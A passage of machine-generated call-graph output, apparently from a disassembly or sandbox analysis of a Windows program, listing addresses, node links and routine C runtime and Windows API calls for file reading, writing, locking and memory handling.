API calls __mbstowcs_l_helper 87234->87287 87249 41d4d1 87235->87249 87238 414956 87239 41496a 87238->87239 87240 41495d 87238->87240 87242 414992 87239->87242 87243 414972 87239->87243 87288 417f77 46 API calls __getptd_noexit 87240->87288 87266 41d218 87242->87266 87289 417f77 46 API calls __getptd_noexit 87243->87289 87246 414933 __wfsopen @_EH4_CallFilterFunc@8 87246->87017 87250 41d4dd __wfsopen 87249->87250 87251 4182cb __lock 46 API calls 87250->87251 87264 41d4eb 87251->87264 87252 41d560 87291 41d5fb 87252->87291 87253 41d567 87255 416b04 __malloc_crt 46 API calls 87253->87255 87256 41d56e 87255->87256 87256->87252 87258 41d57c InitializeCriticalSectionAndSpinCount 87256->87258 87257 41d5f0 __wfsopen 87257->87238 87259 41d59c 87258->87259 87260 41d5af EnterCriticalSection 87258->87260 87263 413748 _free 46 API calls 87259->87263 87260->87252 87261 418209 __mtinitlocknum 46 API calls 87261->87264 87263->87252 87264->87252 87264->87253 87264->87261 87294 4154b2 47 API calls __lock 87264->87294 87295 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87264->87295 87267 41d23a 87266->87267 87268 41d255 87267->87268 87280 41d26c __wopenfile 87267->87280 87300 417f77 46 API calls __getptd_noexit 87268->87300 87270 41d421 87273 41d47a 87270->87273 87274 41d48c 87270->87274 87271 41d25a 87301 417f25 10 API calls __mbstowcs_l_helper 87271->87301 87305 417f77 46 API calls __getptd_noexit 87273->87305 87297 422bf9 87274->87297 87277 41499d 87290 4149b8 LeaveCriticalSection LeaveCriticalSection __wfsopen 87277->87290 87278 41d47f 87306 417f25 10 API calls __mbstowcs_l_helper 87278->87306 87280->87270 87280->87273 87280->87280 87302 41341f 58 API calls 2 library calls 87280->87302 87282 41d41a 87282->87270 87303 41341f 58 API calls 2 library calls 87282->87303 87284 41d439 87284->87270 87304 41341f 58 API calls 2 library calls 87284->87304 87286->87234 87287->87246 87288->87246 87289->87246 87290->87246 87296 4181f2 LeaveCriticalSection 87291->87296 87293 41d602 87293->87257 87294->87264 87295->87264 87296->87293 87307 422b35 87297->87307 87299 422c14 87299->87277 87300->87271 87301->87277 87302->87282 87303->87284 87304->87270 87305->87278 87306->87277 87308 422b41 __wfsopen 87307->87308 87309 422b54 87308->87309 87312 422b8a 87308->87312 87310 417f77 __mbstowcs_l_helper 46 API calls 87309->87310 87311 422b59 87310->87311 87313 417f25 __mbstowcs_l_helper 10 API calls 87311->87313 87314 422400 __tsopen_nolock 109 API calls 87312->87314 87317 422b63 __wfsopen 87313->87317 87315 422ba4 87314->87315 87316 422bcb __wsopen_helper LeaveCriticalSection 87315->87316 87316->87317 87317->87299 87321 4150dd __wfsopen 87318->87321 87319 4150e9 87349 417f77 46 API calls __getptd_noexit 87319->87349 87321->87319 87322 41510f 87321->87322 87331 415471 87322->87331 87323 4150ee 87350 417f25 10 API calls __mbstowcs_l_helper 87323->87350 87330 4150f9 __wfsopen 87330->87019 87332 415483 87331->87332 87333 4154a5 EnterCriticalSection 87331->87333 87332->87333 87335 41548b 87332->87335 87334 415117 87333->87334 87337 415047 87334->87337 87336 4182cb __lock 46 API calls 87335->87336 87336->87334 87338 415057 87337->87338 87340 415067 87337->87340 87400 417f77 46 API calls __getptd_noexit 87338->87400 87339 415079 87369 41443c 87339->87369 87340->87339 87352 414e4e 87340->87352 87344 41505c 87351 415143 LeaveCriticalSection LeaveCriticalSection __wfsopen 87344->87351 87346 414139 __flsbuf 46 API calls 87347 4150b9 87346->87347 87375 41e1f4 87347->87375 87349->87323 87350->87330 87351->87330 87353 414e61 87352->87353 87354 414e79 87352->87354 87401 417f77 46 API calls __getptd_noexit 87353->87401 87355 414139 __flsbuf 46 API calls 87354->87355 87357 414e80 87355->87357 87360 41e1f4 __write 51 API calls 87357->87360 87358 414e66 87402 417f25 10 API calls __mbstowcs_l_helper 87358->87402 87361 414e97 87360->87361 87362 414f09 87361->87362 87364 414ec9 87361->87364 87368 414e71 87361->87368 87403 417f77 46 API calls __getptd_noexit 87362->87403 87365 41e1f4 __write 51 API calls 87364->87365 87364->87368 87366 414f64 87365->87366 87367 41e1f4 __write 51 API calls 87366->87367 87366->87368 87367->87368 87368->87339 87370 414455 87369->87370 87371 414477 87369->87371 87370->87371 87372 414139 __flsbuf 46 API calls 87370->87372 87371->87346 87373 414470 87372->87373 87374 41b7b2 __write 77 API calls 87373->87374 87374->87371 87376 41e200 __wfsopen 87375->87376 87377 41e223 87376->87377 87378 41e208 87376->87378 87379 41e22f 87377->87379 87385 41e269 87377->87385 87414 417f8a 46 API calls __getptd_noexit 87378->87414 87416 417f8a 46 API calls __getptd_noexit 87379->87416 87381 41e20d 87415 417f77 46 API calls __getptd_noexit 87381->87415 87384 41e234 87417 417f77 46 API calls __getptd_noexit 87384->87417 87388 41ae56 ___lock_fhandle 48 API calls 87385->87388 87386 41e215 __wfsopen 87386->87344 87389 41e26f 87388->87389 87391 41e291 87389->87391 87392 41e27d 87389->87392 87390 41e23c 87418 417f25 10 API calls __mbstowcs_l_helper 87390->87418 87419 417f77 46 API calls __getptd_noexit 87391->87419 87404 41e17f 87392->87404 87396 41e296 87420 417f8a 46 API calls __getptd_noexit 87396->87420 87397 41e289 87421 41e2c0 LeaveCriticalSection __unlock_fhandle 87397->87421 87400->87344 87401->87358 87402->87368 87403->87368 87405 41aded __chsize_nolock 46 API calls 87404->87405 87406 41e18e 87405->87406 87407 41e1a4 SetFilePointer 87406->87407 87408 41e194 87406->87408 87410 41e1c3 87407->87410 87411 41e1bb GetLastError 87407->87411 87409 417f77 __mbstowcs_l_helper 46 API calls 87408->87409 87412 41e199 87409->87412 87410->87412 87413 417f9d __dosmaperr 46 API calls 87410->87413 87411->87410 87412->87397 87413->87412 87414->87381 87415->87386 87416->87384 87417->87390 87418->87386 87419->87396 87420->87397 87421->87386 87423 4149ea 87422->87423 87424 4149fe 87422->87424 87468 417f77 46 API calls __getptd_noexit 87423->87468 87425 4149fa 87424->87425 87428 41443c __flush 77 API calls 87424->87428 87440 414ab2 LeaveCriticalSection LeaveCriticalSection __wfsopen 87425->87440 87427 4149ef 87469 417f25 10 API calls __mbstowcs_l_helper 87427->87469 87430 414a0a 87428->87430 87441 41d8c2 87430->87441 87433 414139 __flsbuf 46 API calls 87434 414a18 87433->87434 87445 41d7fe 87434->87445 87436 414a1e 87436->87425 87437 413748 _free 46 API calls 87436->87437 87437->87425 87438->87032 87439->87037 87440->87037 87442 414a12 87441->87442 87443 41d8d2 87441->87443 87442->87433 87443->87442 87444 413748 _free 46 API calls 87443->87444 87444->87442 87446 41d80a __wfsopen 87445->87446 87447 41d812 87446->87447 87448 41d82d 87446->87448 87485 417f8a 46 API calls __getptd_noexit 87447->87485 87449 41d839 87448->87449 87455 41d873 87448->87455 87487 417f8a 46 API calls __getptd_noexit 87449->87487 87451 41d817 87486 417f77 46 API calls __getptd_noexit 87451->87486 87454 41d83e 87488 417f77 46 API calls __getptd_noexit 87454->87488 87458 41ae56 ___lock_fhandle 48 API calls 87455->87458 87456 41d81f __wfsopen 87456->87436 87459 41d879 87458->87459 87461 41d893 87459->87461 87462 41d887 87459->87462 87460 41d846 87489 417f25 10 API calls __mbstowcs_l_helper 87460->87489 87490 417f77 46 API calls __getptd_noexit 87461->87490 87470 41d762 87462->87470 87466 41d88d 87491 41d8ba LeaveCriticalSection __unlock_fhandle 87466->87491 87468->87427 87469->87425 87492 41aded 87470->87492 87472 41d7c8 87505 41ad67 47 API calls 2 library calls 87472->87505 87474 41d772 87474->87472 87476 41aded __chsize_nolock 46 API calls 87474->87476 87484 41d7a6 87474->87484 87475 41aded __chsize_nolock 46 API calls 87477 41d7b2 CloseHandle 87475->87477 87480 41d79d 87476->87480 87477->87472 87481 41d7be GetLastError 87477->87481 87478 41d7f2 87478->87466 87479 41d7d0 87479->87478 87506 417f9d 46 API calls 3 library calls 87479->87506 87483 41aded __chsize_nolock 46 API calls 87480->87483 87481->87472 87483->87484 87484->87472 87484->87475 87485->87451 87486->87456 87487->87454 87488->87460 87489->87456 87490->87466 87491->87456 87493 41ae12 87492->87493 87494 41adfa 87492->87494 87497 417f8a __write_nolock 46 API calls 87493->87497 87498 41ae51 87493->87498 87495 417f8a __write_nolock 46 API calls 87494->87495 87496 41adff 87495->87496 87499 417f77 __mbstowcs_l_helper 46 API calls 87496->87499 87500 41ae23 87497->87500 87498->87474 87502 41ae07 87499->87502 87501 417f77 __mbstowcs_l_helper 46 API calls 87500->87501 87503 41ae2b 87501->87503 87502->87474 87504 417f25 __mbstowcs_l_helper 10 API calls 87503->87504 87504->87502 87505->87479 87506->87478 87508 414c82 __wfsopen 87507->87508 87509 414cc3 87508->87509 87510 414cbb __wfsopen 87508->87510 87514 414c96 __cftof2_l 87508->87514 87511 415471 __lock_file 47 API calls 87509->87511 87510->87042 87513 414ccb 87511->87513 87520 414aba 87513->87520 87534 417f77 46 API calls __getptd_noexit 87514->87534 87515 414cb0 87535 417f25 10 API calls __mbstowcs_l_helper 87515->87535 87524 414ad8 __cftof2_l 87520->87524 87527 414af2 87520->87527 87521 414ae2 87587 417f77 46 API calls __getptd_noexit 87521->87587 87523 414ae7 87588 417f25 10 API calls __mbstowcs_l_helper 87523->87588 87524->87521 87524->87527 87531 414b2d 87524->87531 87536 414cfa LeaveCriticalSection LeaveCriticalSection __wfsopen 87527->87536 87528 414c38 __cftof2_l 87590 417f77 46 API calls __getptd_noexit 87528->87590 87529 414139 __flsbuf 46 API calls 87529->87531 87531->87527 87531->87528 87531->87529 87537 41dfcc 87531->87537 87567 41d8f3 87531->87567 87589 41e0c2 46 API calls 3 library calls 87531->87589 87534->87515 87535->87510 87536->87510 87538 41dfd8 __wfsopen 87537->87538 87539 41dfe0 87538->87539 87540 41dffb 87538->87540 87660 417f8a 46 API calls __getptd_noexit 87539->87660 87541 41e007 87540->87541 87546 41e041 87540->87546 87662 417f8a 46 API calls __getptd_noexit 87541->87662 87544 41dfe5 87661 417f77 46 API calls __getptd_noexit 87544->87661 87545 41e00c 87663 417f77 46 API calls __getptd_noexit 87545->87663 87549 41e063 87546->87549 87550 41e04e 87546->87550 87551 41ae56 ___lock_fhandle 48 API calls 87549->87551 87665 417f8a 46 API calls __getptd_noexit 87550->87665 87553 41e069 87551->87553 87555 41e077 87553->87555 87556 41e08b 87553->87556 87554 41e053 87666 417f77 46 API calls __getptd_noexit 87554->87666 87591 41da15 87555->87591 87667 417f77 46 API calls __getptd_noexit 87556->87667 87561 41e014 87664 417f25 10 API calls __mbstowcs_l_helper 87561->87664 87562 41e083 87669 41e0ba LeaveCriticalSection __unlock_fhandle 87562->87669 87563 41e090 87668 417f8a 46 API calls __getptd_noexit 87563->87668 87566 41dfed __wfsopen 87566->87531 87568 41d900 87567->87568 87572 41d915 87567->87572 87670 417f77 46 API calls __getptd_noexit 87568->87670 87570 41d910 87570->87531 87571 41d905 87671 417f25 10 API calls __mbstowcs_l_helper 87571->87671 87572->87570 87574 41d94a 87572->87574 87575 420603 __getbuf 46 API calls 87572->87575 87576 414139 __flsbuf 46 API calls 87574->87576 87575->87574 87577 41d95e 87576->87577 87578 41dfcc __read 59 API calls 87577->87578 87579 41d965 87578->87579 87579->87570 87580 414139 __flsbuf 46 API calls 87579->87580 87581 41d988 87580->87581 87581->87570 87582 414139 __flsbuf 46 API calls 87581->87582 87583 41d994 87582->87583 87583->87570 87584 414139 __flsbuf 46 API calls 87583->87584 87585 41d9a1 87584->87585 87586 414139 __flsbuf 46 API calls 87585->87586 87586->87570 87587->87523 87588->87527 87589->87531 87590->87523 87592 41da31 87591->87592 87593 41da4c 87591->87593 87594 417f8a __write_nolock 46 API calls 87592->87594 87595 41da5b 87593->87595 87597 41da7a 87593->87597 87596 41da36 87594->87596 87598 417f8a __write_nolock 46 API calls 87595->87598 87599 417f77 __mbstowcs_l_helper 46 API calls 87596->87599 87601 41da98 87597->87601 87613 41daac 87597->87613 87600 41da60 87598->87600 87614 41da3e 87599->87614 87604 417f77 __mbstowcs_l_helper 46 API calls 87600->87604 87602 417f8a __write_nolock 46 API calls 87601->87602 87605 41da9d 87602->87605 87603 41db02 87607 417f8a __write_nolock 46 API calls 87603->87607 87606 41da67 87604->87606 87609 417f77 __mbstowcs_l_helper 46 API calls 87605->87609 87610 417f25 __mbstowcs_l_helper 10 API calls 87606->87610 87608 41db07 87607->87608 87611 417f77 __mbstowcs_l_helper 46 API calls 87608->87611 87612 41daa4 87609->87612 87610->87614 87611->87612 87616 417f25 __mbstowcs_l_helper 10 API calls 87612->87616 87613->87603 87613->87614 87615 41dae1 87613->87615 87617 41db1b 87613->87617 87614->87562 87615->87603 87620 41daec ReadFile 87615->87620 87616->87614 87619 416b04 __malloc_crt 46 API calls 87617->87619 87621 41db31 87619->87621 87622 41dc17 87620->87622 87623 41df8f GetLastError 87620->87623 87626 41db59 87621->87626 87627 41db3b 87621->87627 87622->87623 87628 41dc2b 87622->87628 87624 41de16 87623->87624 87625 41df9c 87623->87625 87635 417f9d __dosmaperr 46 API calls 87624->87635 87657 41dd9b 87624->87657 87630 417f77 __mbstowcs_l_helper 46 API calls 87625->87630 87629 420494 __lseeki64_nolock 48 API calls 87626->87629 87631 417f77 __mbstowcs_l_helper 46 API calls 87627->87631 87636 41dc47 87628->87636 87637 41de5b 87628->87637 87628->87657 87632 41db67 87629->87632 87633 41dfa1 87630->87633 87634 41db40 87631->87634 87632->87620 87638 417f8a __write_nolock 46 API calls 87633->87638 87639 417f8a __write_nolock 46 API calls 87634->87639 87635->87657 87642 41dcab ReadFile 87636->87642 87647 41dd28 87636->87647 87641 41ded0 ReadFile 87637->87641 87637->87657 87638->87657 87639->87614 87640 413748 _free 46 API calls 87640->87614 87644 41deef GetLastError 87641->87644 87651 41def9 87641->87651 87643 41dcc9 GetLastError 87642->87643 87650 41dcd3 87642->87650 87643->87636 87643->87650 87644->87637 87644->87651 87645 41ddec MultiByteToWideChar 87646 41de10 GetLastError 87645->87646 87645->87657 87646->87624 87648 41dda3 87647->87648 87649 41dd96 87647->87649 87653 41dd60 87647->87653 87647->87657 87648->87653 87654 41ddda 87648->87654 87652 417f77 __mbstowcs_l_helper 46 API calls 87649->87652 87650->87636 87655 420494 __lseeki64_nolock 48 API calls 87650->87655 87651->87637 87656 420494 __lseeki64_nolock 48 API calls 87651->87656 87652->87657 87653->87645 87658 420494 __lseeki64_nolock 48 API calls 87654->87658 87655->87650 87656->87651 87657->87614 87657->87640 87659 41dde9 87658->87659 87659->87645 87660->87544 87661->87566 87662->87545 87663->87561 87664->87566 87665->87554 87666->87561 87667->87563 87668->87562 87669->87566 87670->87571 87671->87570 87675 4148b3 GetSystemTimeAsFileTime __aulldiv 87672->87675 87674 442c6b 87674->87045 87675->87674 87676->87052 87677->87058 87678->87058 87683 45272f __tzset_nolock _wcscpy 87679->87683 87680 4528a4 87680->86967 87680->86968 87681 414d04 61 API calls __fread_nolock 87681->87683 87682 44afef GetSystemTimeAsFileTime 87682->87683 87683->87680 87683->87681 87683->87682 87684 4150d1 81 API calls _fseek 87683->87684 87684->87683 87686 44b1bc 87685->87686 87687 44b1ca 87685->87687 87688 4149c2 116 API calls 87686->87688 87689 44b1e1 87687->87689 87690 4149c2 116 API calls 87687->87690 87691 44b1d8 87687->87691 87688->87687 87720 4321a4 87689->87720 87692 44b2db 87690->87692 87691->86995 87692->87689 87694 44b2e9 87692->87694 87696 44b2f6 87694->87696 87699 414a46 __fcloseall 82 API calls 87694->87699 87695 44b224 87697 44b253 87695->87697 87698 44b228 87695->87698 87696->86995 87724 43213d 87697->87724 87701 44b235 87698->87701 87704 414a46 __fcloseall 82 API calls 87698->87704 87699->87696 87702 44b245 87701->87702 87705 414a46 __fcloseall 82 API calls 87701->87705 87702->86995 87703 44b25a 87706 44b260 87703->87706 87707 44b289 87703->87707 87704->87701 87705->87702 87709 44b26d 87706->87709 87711 414a46 __fcloseall 82 API calls 87706->87711 87734 44b0bf 87707->87734 87712 44b27d 87709->87712 87714 414a46 __fcloseall 82 API calls 87709->87714 87710 44b28f 87743 4320f8 87710->87743 87711->87709 87712->86995 87714->87712 87716 44b2a2 87718 44b2b2 87716->87718 87719 414a46 __fcloseall 82 API calls 87716->87719 87717 414a46 __fcloseall 82 API calls 87717->87716 87718->86995 87719->87718 87721 4321cb 87720->87721 87723 4321b4 __tzset_nolock _memmove 87720->87723 87722 414d04 __fread_nolock 61 API calls 87721->87722 87722->87723 87723->87695 87725 4135bb _malloc 46 API calls 87724->87725 87726 432150 87725->87726 87727 4135bb _malloc 46 API calls 87726->87727 87728 432162 87727->87728 87729 4135bb _malloc 46 API calls 87728->87729 87730 432174 87729->87730 87731 4320f8 46 API calls 87730->87731 87733 432189 87730->87733 87732 432198 87731->87732 87732->87703 87733->87703 87735 44b18e 87734->87735 87739 44b0da 87734->87739 87753 43206e 79 API calls 87735->87753 87737 442caf 61 API calls 87737->87739 87738 44b194 87738->87710 87739->87735 87739->87737 87742 44b19d 87739->87742 87751 44b040 61 API calls 87739->87751 87752 442d48 79 API calls 87739->87752 87742->87710 87744 43210f 87743->87744 87745 432109 87743->87745 87747 432122 87744->87747 87748 413748 _free 46 API calls 87744->87748 87746 413748 _free 46 API calls 87745->87746 87746->87744 87749 413748 _free 46 API calls 87747->87749 87750 432135 87747->87750 87748->87747 87749->87750 87750->87716 87750->87717 87751->87739 87752->87739 87753->87738 87754->86897 87755->86900 87756->86917 87757->86917 87758->86917 87759->86912 87760->86917 87761->86917 87762->86922 87763->86931 87764->86933 87765->86933 87815 410160 87766->87815 87768 41012f GetFullPathNameW 87769 410147 moneypunct 87768->87769 87769->86752 87771 4102cb SHGetDesktopFolder 87770->87771 87774 410333 _wcsncpy 87770->87774 87772 4102e0 _wcsncpy 87771->87772 87771->87774 87773 41031c SHGetPathFromIDListW 87772->87773 87772->87774 87773->87774 87774->86755 87776 4101bb 87775->87776 87780 425f4a 87775->87780 87777 410160 52 API calls 87776->87777 87779 4101c7 87777->87779 87778 4114ab __wcsicoll 58 API calls 87778->87780 87819 410200 52 API calls 2 library calls 87779->87819 87780->87778 87782 425f6e 87780->87782 87782->86757 87783 4101d6 87820 410200 52 API calls 2 library calls 87783->87820 87785 4101e9 87785->86757 87787 40f760 128 API calls 87786->87787 87788 40f584 87787->87788 87789 429335 87788->87789 87790 40f58c 87788->87790 87793 4528bd 118 API calls 87789->87793 87791 40f598 87790->87791 87792 429358 87790->87792 87835 4033c0 113 API calls 7 library calls 87791->87835 87836 434034 86 API calls _wprintf 87792->87836 87796 42934b 87793->87796 87799 429373 87796->87799 87800 42934f 87796->87800 87797 429369 87797->87799 87798 40f5b4 87798->86753 87802 4115d7 52 API calls 87799->87802 87801 431e58 82 API calls 87800->87801 87801->87792 87809 4293c5 moneypunct 87802->87809 87803 42959c 87804 413748 _free 46 API calls 87803->87804 87805 4295a5 87804->87805 87806 431e58 82 API calls 87805->87806 87807 4295b1 87806->87807 87809->87803 87812 401b10 52 API calls 87809->87812 87821 402780 87809->87821 87829 4022d0 87809->87829 87837 444af8 52 API calls _memmove 87809->87837 87838 44c7dd 64 API calls 3 library calls 87809->87838 87839 44b41c 52 API calls 87809->87839 87812->87809 87816 410167 _wcslen 87815->87816 87817 4115d7 52 API calls 87816->87817 87818 41017e _wcscpy 87817->87818 87818->87768 87819->87783 87820->87785 87822 402790 moneypunct _memmove 87821->87822 87823 402827 87821->87823 87824 4115d7 52 API calls 87822->87824 87825 4115d7 52 API calls 87823->87825 87826 402797 87824->87826 87825->87822 87827 4115d7 52 API calls 87826->87827 87828 4027bd 87826->87828 87827->87828 87828->87809 87830 4022e0 87829->87830 87832 40239d 87829->87832 87831 4115d7 52 API calls 87830->87831 87830->87832 87833 402320 moneypunct 87830->87833 87831->87833 87832->87809 87833->87832 87834 4115d7 52 API calls 87833->87834 87834->87833 87835->87798 87836->87797 87837->87809 87838->87809 87839->87809 87841 402539 moneypunct 87840->87841 87842 402417 87840->87842 87841->86761 87842->87841 87843 4115d7 52 API calls 87842->87843 87844 402443 87843->87844 87845 4115d7 52 API calls 87844->87845 87846 4024b4 87845->87846 87846->87841 87848 4022d0 52 API calls 87846->87848 87869 402880 87846->87869 87848->87846 87854 401566 87849->87854 87850 401794 87920 40e9a0 90 API calls 87850->87920 87853 40167a 87856 4017c0 87853->87856 87921 45e737 90 API calls 3 library calls 87853->87921 87854->87850 87854->87853 87855 4010a0 52 API calls 87854->87855 87855->87854 87856->86764 87858 40bc70 52 API calls 87857->87858 87862 40d451 87858->87862 87859 40d50f 87924 410600 52 API calls 87859->87924 87861 40e0a0 52 API calls 87861->87862 87862->87859 87862->87861 87864 401b10 52 API calls 87862->87864 87865 40d519 87862->87865 87867 427c01 87862->87867 87922 40f310 53 API calls 87862->87922 87923 40d860 91 API calls 87862->87923 87864->87862 87865->86766 87925 45e737 90 API calls 3 library calls 87867->87925 87870 4115d7 52 API calls 87869->87870 87871 4028b3 87870->87871 87872 4115d7 52 API calls 87871->87872 87910 4028c5 moneypunct _memmove 87872->87910 87873 402780 52 API calls 87908 402b1e moneypunct 87873->87908 87874 427d62 87878 403350 52 API calls 87874->87878 87876 402bb6 87912 403060 53 API calls 87876->87912 87877 402aeb moneypunct 87877->87873 87881 42802b moneypunct 87877->87881 87889 427d6b 87878->87889 87880 402bca 87882 427f63 87880->87882 87883 402bd4 87880->87883 87917 460879 92 API calls 3 library calls 87882->87917 87886 402780 52 API calls 87883->87886 87884 403350 52 API calls 87884->87910 87888 402bdf 87886->87888 87888->87846 87891 427f2c 87889->87891 87915 403020 52 API calls _memmove 87889->87915 87890 427fd5 87918 460879 92 API calls 3 library calls 87890->87918 87916 460879 92 API calls 3 library calls 87891->87916 87892 402780 52 API calls 87892->87910 87895 427f48 87895->87908 87897 402f00 52 API calls 87897->87910 87898 4013a0 52 API calls 87898->87910 87899 427fe4 87906 402780 52 API calls 87899->87906 87900 427fa5 87907 402780 52 API calls 87900->87907 87901 428000 87919 460879 92 API calls 3 library calls 87901->87919 87902 4026f0 52 API calls 87905 402a85 CharUpperBuffW 87902->87905 87905->87910 87906->87895 87907->87908 87908->87846 87909 4115d7 52 API calls 87909->87910 87910->87874 87910->87876 87910->87877 87910->87884 87910->87890 87910->87891 87910->87892 87910->87897 87910->87898 87910->87900 87910->87901 87910->87902 87910->87909 87911 4031b0 63 API calls 87910->87911 87913 402f80 92 API calls _memmove 87910->87913 87914 402280 52 API calls 87910->87914 87911->87910 87912->87880 87913->87910 87914->87910 87915->87889 87916->87895 87917->87895 87918->87899 87919->87908 87920->87853 87921->87856 87922->87862 87923->87862 87924->87865 87925->87865 87926->86780 87927->86779 87929 42c5fe 87928->87929 87944 4091c6 87928->87944 87930 40bc70 52 API calls 87929->87930 87929->87944 87931 42c64e InterlockedIncrement 87930->87931 87932 42c665 87931->87932 87937 42c697 87931->87937 87935 42c672 InterlockedDecrement Sleep InterlockedIncrement 87932->87935 87932->87937 87933 42c737 InterlockedDecrement 87934 42c74a 87933->87934 87938 408f40 VariantClear 87934->87938 87935->87932 87935->87937 87936 42c731 87936->87933 87937->87933 87937->87936 88086 408e80 87937->88086 87940 42c752 87938->87940 88099 410c60 VariantClear moneypunct 87940->88099 87944->86820 87945 42c6db 87946 402160 52 API calls 87945->87946 87947 42c6e5 87946->87947 87948 45340c 85 API calls 87947->87948 87949 42c6f1 87948->87949 88096 40d200 52 API calls 2 library calls 87949->88096 87951 42c6fb 88097 465124 53 API calls 87951->88097 87953 42c715 87954 42c76a 87953->87954 87955 42c719 87953->87955 87957 401b10 52 API calls 87954->87957 88098 46fe32 VariantClear 87955->88098 87958 42c77e 87957->87958 87959 401980 53 API calls 87958->87959 87966 42c796 87959->87966 87960 42c812 88106 46fe32 VariantClear 87960->88106 87962 42c82a InterlockedDecrement 88107 46ff07 54 API calls 87962->88107 87964 42c849 87968 42c9ec 87964->87968 87973 408f40 VariantClear 87964->87973 87976 402780 52 API calls 87964->87976 87981 401980 53 API calls 87964->87981 88110 40a780 87964->88110 87965 42c864 88108 45e737 90 API calls 3 library calls 87965->88108 87966->87960 87966->87965 88100 40ba10 87966->88100 88151 47d33e 381 API calls 87968->88151 87971 42c9fe 88152 46feb1 VariantClear VariantClear 87971->88152 87973->87964 87974 42ca08 87975 408f40 VariantClear 87978 42c891 87975->87978 87976->87964 88109 410c60 VariantClear moneypunct 87978->88109 87981->87964 87983 42c874 87983->87975 87985 42ca59 87983->87985 87985->87985 87987 40afc4 87986->87987 87988 40b156 87986->87988 87989 40afd5 87987->87989 87990 42d1e3 87987->87990 88163 45e737 90 API calls 3 library calls 87988->88163 87994 40a780 242 API calls 87989->87994 88007 40b11a moneypunct 87989->88007 88164 45e737 90 API calls 3 library calls 87990->88164 87993 42d1f8 87999 408f40 VariantClear 87993->87999 87996 40b00a 87994->87996 87995 40b143 87995->86820 87996->87993 88000 40b012 87996->88000 87998 42d4db 87998->87998 87999->87995 88001 42d231 VariantClear 88000->88001 88002 40b04a 88000->88002 88009 40b094 moneypunct 88000->88009 88011 40b05c moneypunct 88001->88011 88002->88011 88165 40e270 VariantClear moneypunct 88002->88165 88003 42d45a VariantClear 88003->88007 88004 40b108 88004->88007 88166 40e270 VariantClear moneypunct 88004->88166 88006 4115d7 52 API calls 88006->88009 88007->87995 88167 45e737 90 API calls 3 library calls 88007->88167 88009->88004 88010 42d425 moneypunct 88009->88010 88010->88003 88010->88007 88011->88006 88011->88009 88013 408fff 88012->88013 88017 40900d 88012->88017 88168 403ea0 52 API calls __cinit 88013->88168 88016 42c3f6 88171 45e737 90 API calls 3 library calls 88016->88171 88017->88016 88019 40a780 242 API calls 88017->88019 88020 4090f2 moneypunct 88017->88020 88021 42c44a 88017->88021 88022 42c47b 88017->88022 88025 42c564 88017->88025 88027 42c4cb 88017->88027 88029 42c548 88017->88029 88033 409112 88017->88033 88035 4090df 88017->88035 88037 42c528 88017->88037 88039 4090ea 88017->88039 88170 4534e3 52 API calls 88017->88170 88172 40c4e0 242 API calls 88017->88172 88019->88017 88020->86820 88173 45e737 90 API calls 3 library calls 88021->88173 88174 451b42 61 API calls 88022->88174 88030 408f40 VariantClear 88025->88030 88176 47faae 281 API calls 88027->88176 88179 45e737 90 API calls 3 library calls 88029->88179 88030->88020 88031 42c491 88031->88020 88175 45e737 90 API calls 3 library calls 88031->88175 88032 42c4da 88032->88020 88177 45e737 90 API calls 3 library calls 88032->88177 88033->88029 88042 40912b 88033->88042 88035->88039 88040 408e80 VariantClear 88035->88040 88178 45e737 90 API calls 3 library calls 88037->88178 88043 408f40 VariantClear 88039->88043 88040->88039 88042->88020 88169 403e10 53 API calls 88042->88169 88043->88020 88045 40914b 88046 408f40 VariantClear 88045->88046 88046->88020 88180 408d90 88047->88180 88049 429778 88210 410c60 VariantClear moneypunct 88049->88210 88051 408cf9 88051->88049 88053 42976c 88051->88053 88055 408d2d 88051->88055 88052 429780 88209 45e737 90 API calls 3 library calls 88053->88209 88196 403d10 88055->88196 88058 408d71 moneypunct 88058->86820 88059 408f40 VariantClear 88060 408d45 moneypunct 88059->88060 88060->88058 88060->88059 88061->86820 88062->86820 88063->86820 88064->86820 88065->86790 88066->86795 88067->86820 88068->86820 88069->86820 88070->86820 88071->86817 88072->86817 88073->86817 88074->86817 88075->86817 88076->86817 88077->86817 88079 403cdf 88078->88079 88080 408f40 VariantClear 88079->88080 88081 403ce7 88080->88081 88081->86837 88082->86817 88083->86817 88084->86820 88085->86787 88087 408e94 88086->88087 88088 408e88 88086->88088 88090 45340c 88087->88090 88089 408f40 VariantClear 88088->88089 88089->88087 88091 453439 88090->88091 88092 453419 88090->88092 88091->87945 88093 45342f 88092->88093 88153 4531b1 85 API calls 5 library calls 88092->88153 88093->87945 88095 453425 88095->87945 88096->87951 88097->87953 88098->87936 88099->87944 88101 40ba49 88100->88101 88102 40ba1b moneypunct _memmove 88100->88102 88104 4115d7 52 API calls 88101->88104 88103 4115d7 52 API calls 88102->88103 88105 40ba22 88103->88105 88104->88102 88105->87966 88106->87962 88107->87964 88108->87983 88109->87944 88111 40a7a6 88110->88111 88112 40ae8c 88110->88112 88114 4115d7 52 API calls 88111->88114 88154 41130a 51 API calls __cinit 88112->88154 88149 40a7c6 moneypunct _memmove 88114->88149 88115 40a86d 88116 40abd1 88115->88116 88117 401b10 52 API calls 88117->88149 88119 40bc10 53 API calls 88119->88149 88120 42b791 VariantClear 88120->88149 88121 408e80 VariantClear 88121->88149 88122 42ba2d VariantClear 88122->88149 88124 40e270 VariantClear 88124->88149 88125 42b459 VariantClear 88125->88149 88128 408cc0 235 API calls 88128->88149 88129 42b6f6 VariantClear 88129->88149 88130 4530c9 VariantClear 88130->88149 88132 42bbf5 88133 42bb6a 88135 4115d7 52 API calls 88135->88149 88136 40b5f0 89 API calls 88136->88149 88138 4115d7 52 API calls 88141 408f40 VariantClear 88141->88149 88145 42bc37 88149->88115 88149->88116 88149->88117 88149->88119 88149->88120 88149->88121 88149->88122 88149->88124 88149->88125 88149->88128 88149->88129 88149->88130 88149->88132 88149->88133 88149->88135 88149->88136 88149->88138 88149->88141 88149->88145 88155 45308a 53 API calls 88149->88155 88156 470870 52 API calls 88149->88156 88157 457f66 87 API calls __write_nolock 88149->88157 88158 472f47 127 API calls 88149->88158 88151->87971 88152->87974 88153->88095 88154->88149 88155->88149 88156->88149 88157->88149 88158->88149 88163->87990 88164->87993 88165->88011 88166->88007 88167->87998 88168->88017 88169->88045 88170->88017 88171->88020 88172->88017 88173->88020 88174->88031 88175->88020 88176->88032 88177->88020 88178->88020 88179->88025 88181 4289d2 88180->88181 88182 408db3 88180->88182 88216 45e737 90 API calls 3 library calls 88181->88216 88211 40bec0 88182->88211 88185 4289e5 88217 45e737 90 API calls 3 library calls 